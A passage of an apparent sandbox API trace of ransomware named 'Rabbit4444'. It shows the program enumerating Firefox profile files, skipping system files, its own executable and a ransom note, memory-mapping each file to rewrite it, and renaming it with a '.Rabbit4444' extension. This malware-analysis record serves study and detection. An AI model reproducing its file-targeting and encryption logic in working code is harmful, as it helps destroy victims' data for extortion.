lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.430] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0x72e7b76, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite-shm", cAlternateFileName="PLACES~3.SQL")) returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="Rabbit4444.exe") returned -1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2=".") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="..") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="windows") returned -1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="bootmgr") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="pagefile.sys") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="boot") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="ids.txt") returned 1 [0051.431] lstrcmpiW (lpString1="places.sqlite-shm", lpString2="NTUSER.DAT") returned 1 [0051.431] lstrcpyW (in: lpString1=0x130ebcc, lpString2="places.sqlite-shm" | out: lpString1="places.sqlite-shm") returned="places.sqlite-shm" [0051.431] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm", dwFileAttributes=0x0) returned 1 [0051.431] lstrlenW (lpString="places.sqlite-shm") returned 17 [0051.431] lstrlenW (lpString="Rabbit4444") returned 10 [0051.431] lstrcmpiW (lpString1="sqlite-shm", lpString2="Rabbit4444") returned 1 [0051.431] lstrlenW (lpString=".dll") returned 4 [0051.431] lstrcmpiW (lpString1="-shm", lpString2=".dll") returned 1 [0051.431] lstrlenW (lpString=".lnk") returned 4 [0051.431] lstrcmpiW (lpString1="-shm", lpString2=".lnk") returned 1 [0051.431] lstrlenW (lpString=".ini") returned 4 [0051.431] lstrcmpiW (lpString1="-shm", lpString2=".ini") returned 1 [0051.431] lstrlenW (lpString=".sys") returned 4 [0051.431] lstrcmpiW (lpString1="-shm", lpString2=".sys") returned 1 [0051.431] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.432] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.432] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14274233113) returned 1 [0051.432] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32768) returned 1 [0051.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0051.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0051.432] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8300, lpName=0x0) returned 0x298 [0051.473] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8300) returned 0x70000 [0051.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0051.485] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0051.485] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0051.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0051.486] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14279639821) returned 1 [0051.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0051.486] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0051.486] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.486] CloseHandle (hObject=0x298) returned 1 [0051.486] CloseHandle (hObject=0x278) returned 1 [0051.486] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm.Rabbit4444") returned 102 [0051.486] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-shm.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-shm.rabbit4444"), dwFlags=0x1) returned 1 [0051.487] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba329010, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xba329010, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x208638, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="places.sqlite-wal", cAlternateFileName="PLACES~2.SQL")) returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="Rabbit4444.exe") returned -1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2=".") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="..") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="windows") returned -1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="bootmgr") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="pagefile.sys") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="boot") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="ids.txt") returned 1 [0051.487] lstrcmpiW (lpString1="places.sqlite-wal", lpString2="NTUSER.DAT") returned 1 [0051.487] lstrcpyW (in: lpString1=0x130ebcc, lpString2="places.sqlite-wal" | out: lpString1="places.sqlite-wal") returned="places.sqlite-wal" [0051.487] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal", dwFileAttributes=0x0) returned 1 [0051.487] lstrlenW (lpString="places.sqlite-wal") returned 17 [0051.487] lstrlenW (lpString="Rabbit4444") returned 10 [0051.487] lstrcmpiW (lpString1="sqlite-wal", lpString2="Rabbit4444") returned 1 [0051.488] lstrlenW (lpString=".dll") returned 4 [0051.488] lstrcmpiW (lpString1="-wal", lpString2=".dll") returned 1 [0051.488] lstrlenW (lpString=".lnk") returned 4 [0051.488] lstrcmpiW (lpString1="-wal", lpString2=".lnk") returned 1 [0051.488] lstrlenW (lpString=".ini") returned 4 [0051.488] lstrcmpiW (lpString1="-wal", lpString2=".ini") returned 1 [0051.488] lstrlenW (lpString=".sys") returned 4 [0051.488] lstrcmpiW (lpString1="-wal", lpString2=".sys") returned 1 [0051.488] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.488] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.488] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14279868361) returned 1 [0051.488] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2131512) returned 1 [0051.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0051.488] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0051.488] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x208940, lpName=0x0) returned 0x298 [0051.492] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x8940) returned 0x70000 [0051.494] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x2c20000 [0051.624] UnmapViewOfFile (lpBaseAddress=0x2c20000) returned 1 [0051.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.811] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14312255628) returned 1 [0051.812] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0051.812] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0051.812] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.812] CloseHandle (hObject=0x298) returned 1 [0051.812] CloseHandle (hObject=0x278) returned 1 [0051.813] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal.Rabbit4444") returned 102 [0051.813] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\places.sqlite-wal.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\places.sqlite-wal.rabbit4444"), dwFlags=0x1) returned 1 [0051.814] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40cce7aa, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x40cce7aa, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x40ccfb2d, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Rabbit4444.exe") returned -1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2=".") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="..") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="windows") returned -1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootmgr") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="pagefile.sys") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ids.txt") returned 1 [0051.814] lstrcmpiW (lpString1="pluginreg.dat", lpString2="NTUSER.DAT") returned 1 [0051.814] lstrcpyW (in: lpString1=0x130ebcc, lpString2="pluginreg.dat" | out: lpString1="pluginreg.dat") returned="pluginreg.dat" [0051.814] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat", dwFileAttributes=0x0) returned 1 [0051.815] lstrlenW (lpString="pluginreg.dat") returned 13 [0051.815] lstrlenW (lpString="Rabbit4444") returned 10 [0051.815] lstrcmpiW (lpString1="ginreg.dat", lpString2="Rabbit4444") returned -1 [0051.815] lstrlenW (lpString=".dll") returned 4 [0051.815] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0051.815] lstrlenW (lpString=".lnk") returned 4 [0051.815] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0051.815] lstrlenW (lpString=".ini") returned 4 [0051.815] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0051.815] lstrlenW (lpString=".sys") returned 4 [0051.815] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0051.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.815] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.815] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14312623444) returned 1 [0051.816] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=461) returned 1 [0051.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0051.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0051.816] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4d0, lpName=0x0) returned 0x298 [0051.817] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d0) returned 0x70000 [0051.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0051.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0051.819] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0051.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.819] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0051.819] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14313020982) returned 1 [0051.820] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0051.820] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0051.820] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.820] CloseHandle (hObject=0x298) returned 1 [0051.820] CloseHandle (hObject=0x278) returned 1 [0051.820] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat.Rabbit4444") returned 98 [0051.820] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\pluginreg.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\pluginreg.dat.rabbit4444"), dwFlags=0x1) returned 1 [0051.820] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8285d1c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8285d1c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x93d01742, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1fcd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="Rabbit4444.exe") returned -1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2=".") returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="..") returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="windows") returned -1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="bootmgr") returned 1 [0051.820] lstrcmpiW (lpString1="prefs.js", lpString2="pagefile.sys") returned 1 [0051.821] lstrcmpiW (lpString1="prefs.js", lpString2="boot") returned 1 [0051.821] lstrcmpiW (lpString1="prefs.js", lpString2="ids.txt") returned 1 [0051.821] lstrcmpiW (lpString1="prefs.js", lpString2="NTUSER.DAT") returned 1 [0051.821] lstrcpyW (in: lpString1=0x130ebcc, lpString2="prefs.js" | out: lpString1="prefs.js") returned="prefs.js" [0051.821] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js", dwFileAttributes=0x0) returned 1 [0051.821] lstrlenW (lpString="prefs.js") returned 8 [0051.821] lstrlenW (lpString="Rabbit4444") returned 10 [0051.821] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0051.821] lstrlenW (lpString=".dll") returned 4 [0051.821] lstrcmpiW (lpString1="s.js", lpString2=".dll") returned 1 [0051.821] lstrlenW (lpString=".lnk") returned 4 [0051.821] lstrcmpiW (lpString1="s.js", lpString2=".lnk") returned 1 [0051.821] lstrlenW (lpString=".ini") returned 4 [0051.821] lstrcmpiW (lpString1="s.js", lpString2=".ini") returned 1 [0051.821] lstrlenW (lpString=".sys") returned 4 [0051.821] lstrcmpiW (lpString1="s.js", lpString2=".sys") returned 1 [0051.821] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.821] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.821] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14313216239) returned 1 [0051.821] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8141) returned 1 [0051.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0051.822] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0051.822] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22d0, lpName=0x0) returned 0x298 [0051.823] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22d0) returned 0x70000 [0051.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0051.824] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.824] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0051.825] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14313551859) returned 1 [0051.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0051.825] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0051.825] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.825] CloseHandle (hObject=0x298) returned 1 [0051.825] CloseHandle (hObject=0x278) returned 1 [0051.825] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js.Rabbit4444") returned 93 [0051.825] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js.rabbit4444"), dwFlags=0x1) returned 1 [0051.826] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8d8cb9a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="saved-telemetry-pings", cAlternateFileName="SAVED-~1")) returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="Rabbit4444.exe") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2=".") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="..") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="windows") returned -1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="bootmgr") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="pagefile.sys") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="boot") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="ids.txt") returned 1 [0051.826] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="NTUSER.DAT") returned 1 [0051.826] lstrcpyW (in: lpString1=0x130ebcc, lpString2="saved-telemetry-pings" | out: lpString1="saved-telemetry-pings") returned="saved-telemetry-pings" [0051.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6588 [0051.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0xf1e00 [0051.826] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6590 | out: ListHead=0xf68b0, ListEntry=0xf6590) returned 0xf64b0 [0051.826] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4731d65, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4731d65, 